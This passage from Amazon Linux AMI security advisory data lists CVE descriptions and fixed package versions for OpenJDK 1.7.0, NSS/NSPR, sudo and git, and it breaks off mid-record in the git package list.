Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2988 OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292)
1760999: CVE-2019-2988 OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292)
1760999:
CVE-2019-2988 OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292)
CVE-2019-2987:
Vulnerability in the Java SE product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 11.0.4 and 13. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2987 OpenJDK: Missing glyph bitmap image dimension check in FreetypeFontScaler (2D, 8225286)
1761149: CVE-2019-2987 OpenJDK: Missing glyph bitmap image dimension check in FreetypeFontScaler (2D, 8225286)
1761149:
CVE-2019-2987 OpenJDK: Missing glyph bitmap image dimension check in FreetypeFontScaler (2D, 8225286)
CVE-2019-2983:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2983 OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915)
1761262: CVE-2019-2983 OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915)
1761262:
CVE-2019-2983 OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915)
CVE-2019-2981:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2981 OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532)
1760980: CVE-2019-2981 OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532)
1760980:
CVE-2019-2981 OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532)
CVE-2019-2978:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2978 OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892)
1761006: CVE-2019-2978 OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892)
1761006:
CVE-2019-2978 OpenJDK: Incorrect handling of nested jar: URLs in Jar URL handler (Networking, 8223892)
CVE-2019-2973:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JAXP). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2973 OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505)
1760978: CVE-2019-2973 OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505)
1760978:
CVE-2019-2973 OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505)
CVE-2019-2964:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Concurrency). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2964 OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684)
1760963: CVE-2019-2964 OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684)
1760963:
CVE-2019-2964 OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684)
CVE-2019-2962:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: 2D). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2962 OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690)
1761266: CVE-2019-2962 OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690)
1761266:
CVE-2019-2962 OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690)
CVE-2019-2945:
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Networking). Supported versions that are affected are Java SE: 7u231, 8u221, 11.0.4 and 13; Java SE Embedded: 8u221. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).
No description is available for this CVE.
99999:
CVE-2019-2945 OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573)
1761596: CVE-2019-2945 OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573)
1761596:
CVE-2019-2945 OpenJDK: Missing restrictions on use of custom SocketImpl (Networking, 8218573)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2945" title="" id="CVE-2019-2945" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2962" title="" id="CVE-2019-2962" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2964" title="" id="CVE-2019-2964" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2973" title="" id="CVE-2019-2973" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2978" title="" id="CVE-2019-2978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2981" title="" id="CVE-2019-2981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2983" title="" id="CVE-2019-2983" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2987" title="" id="CVE-2019-2987" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2988" title="" id="CVE-2019-2988" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2989" title="" id="CVE-2019-2989" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2992" title="" id="CVE-2019-2992" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2999" title="" id="CVE-2019-2999" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2583" title="" id="CVE-2020-2583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2590" title="" id="CVE-2020-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2593" title="" id="CVE-2020-2593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2601" title="" id="CVE-2020-2601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2604" title="" id="CVE-2020-2604" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2654" title="" id="CVE-2020-2654" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2659" title="" id="CVE-2020-2659" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.251-2.6.21.0.82.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.251-2.6.21.0.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.251-2.6.21.0.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.251-2.6.21.0.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.251-2.6.21.0.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.251-2.6.21.0.82.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.251-2.6.21.0.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.251-2.6.21.0.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.251-2.6.21.0.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.251-2.6.21.0.82.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.251" release="2.6.21.0.82.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.251-2.6.21.0.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1355</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1355: important priority package update for nss nss-softokn nss-util nspr</title><issued date="2020-03-16 21:29:00" /><updated date="2020-03-18 22:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11745:
When encrypting with a block cipher, if a call to NSC_EncryptUpdate was made with data smaller than the block size, a small out of bounds write could occur. This could have caused heap corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 68.3, Firefox ESR < 68.3, and Firefox < 71.
A heap-based buffer overflow was found in the NSC_EncryptUpdate() function in Mozilla nss. A remote attacker could trigger this flaw via SRTP encrypt or decrypt operations, to execute arbitrary code with the permissions of the user running the application (compiled with nss). While the attack complexity is high, the impact to confidentiality, integrity, and availability are high as well.
99999:
CVE-2019-11745 nss: Out-of-bounds write when passing an output buffer smaller than the block size to NSC_EncryptUpdate
1774831: CVE-2019-11745 nss: Out-of-bounds write when passing an output buffer smaller than the block size to NSC_EncryptUpdate
CVE-2019-11729:
Empty or malformed p256-ECDH public keys may trigger a segmentation fault due values being improperly sanitized before being copied into memory and used. This vulnerability affects Firefox ESR < 60.8, Firefox < 68, and Thunderbird < 60.8.
Empty or malformed p256-ECDH public keys may trigger a segmentation fault due values being improperly sanitized before being copied into memory and used. This vulnerability affects Firefox ESR &lt; 60.8, Firefox &lt; 68, and Thunderbird &lt; 60.8.
99999:
CVE-2019-11729 nss: Empty or malformed p256-ECDH public keys may trigger a segmentation fault
1728437: CVE-2019-11729 nss: Empty or malformed p256-ECDH public keys may trigger a segmentation fault
CVE-2018-12404:
A cached side channel attack during handshakes using RSA encryption could allow for the decryption of encrypted content. This is a variant of the Adaptive Chosen Ciphertext attack (AKA Bleichenbacher attack) and affects all NSS versions prior to NSS 3.41.
1657913: CVE-2018-12404 nss: Cache side-channel variant of the Bleichenbacher attack
1657913:
CVE-2018-12404 nss: Cache side-channel variant of the Bleichenbacher attack
CVE-2018-0495:
Libgcrypt before 1.7.10 and 1.8.x before 1.8.3 allows a memory-cache side-channel attack on ECDSA signatures that can be mitigated through the use of blinding during the signing process in the _gcry_ecc_ecdsa_sign function in cipher/ecc-ecdsa.c, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.
1591163: CVE-2018-0495 ROHNP: Key Extraction Side Channel in Multiple Crypto Libraries
1591163:
CVE-2018-0495 openssl: ROHNP - Key Extraction Side Channel in Multiple Crypto Libraries
1591163:
CVE-2018-0495 ROHNP: Key Extraction Side Channel in Multiple Crypto Libraries
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0495" title="" id="CVE-2018-0495" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12404" title="" id="CVE-2018-12404" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11729" title="" id="CVE-2019-11729" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11745" title="" id="CVE-2019-11745" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr-devel" version="4.21.0" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.21.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.21.0" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.21.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.21.0" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.21.0-1.43.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.21.0" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.21.0-1.43.amzn1.i686.rpm</filename></package><package name="nspr" version="4.21.0" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.21.0-1.43.amzn1.i686.rpm</filename></package><package name="nspr-devel" version="4.21.0" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.21.0-1.43.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.44.0" release="4.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.44.0-4.56.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.44.0" release="4.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.44.0-4.56.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.44.0" release="4.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.44.0-4.56.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.44.0" release="4.56.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.44.0-4.56.amzn1.i686.rpm</filename></package><package name="nss-util" version="3.44.0" release="4.56.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.44.0-4.56.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.44.0" release="4.56.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.44.0-4.56.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.44.0" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.44.0-8.44.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.44.0" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.44.0-8.44.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.44.0" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.44.0-8.44.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.44.0" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.44.0-8.44.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.44.0" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.44.0-8.44.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.44.0" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.44.0-8.44.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.44.0" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.44.0-8.44.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.44.0" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.44.0-8.44.amzn1.i686.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.44.0" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.44.0-8.44.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.44.0" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.44.0-8.44.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.44.0" release="7.84.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.44.0-7.84.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.44.0-7.84.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.44.0-7.84.amzn1.i686.rpm</filename></package><package name="nss" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.44.0-7.84.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.44.0-7.84.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.44.0-7.84.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.44.0" release="7.84.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.44.0-7.84.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1356</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1356: important priority package update for sudo</title><issued date="2020-03-16 21:29:00" /><updated date="2020-03-18 22:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18634:
In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. (pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for upstream and many other packages, and would exist only if enabled by an administrator.) The attacker needs to deliver a long string to the stdin of getln() in tgetpass.c.
1796944: CVE-2019-18634 sudo: Stack based buffer overflow when pwfeedback is enabled
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18634" title="" id="CVE-2019-18634" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo-devel" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-29.30.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-29.30.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-29.30.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-29.30.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-29.30.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.6p3" release="29.30.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-29.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1357</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1357: important priority package update for git</title><issued date="2020-04-15 17:03:00" /><updated date="2020-04-17 00:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-5260:
Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing. The vulnerability can be triggered by feeding a malicious URL to git clone. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The problem has been patched in the versions published on April 14th, 2020, going back to v2.17.x. Anyone wishing to backport the change further can do so by applying commit 9a6bbee (the full release includes extra checks for git fsck, but that commit is sufficient to protect clients against the vulnerability). The patched versions are: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1.
1822020: CVE-2020-5260 git: Crafted URL containing new lines can cause credential leak
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5260" title="" id="CVE-2020-5260" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="emacs-git-el" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.14.6" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.14.6-1.62.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.14.6" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.14.6-1.62.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.14.6" release="1.62.amzn1" epoch="0" 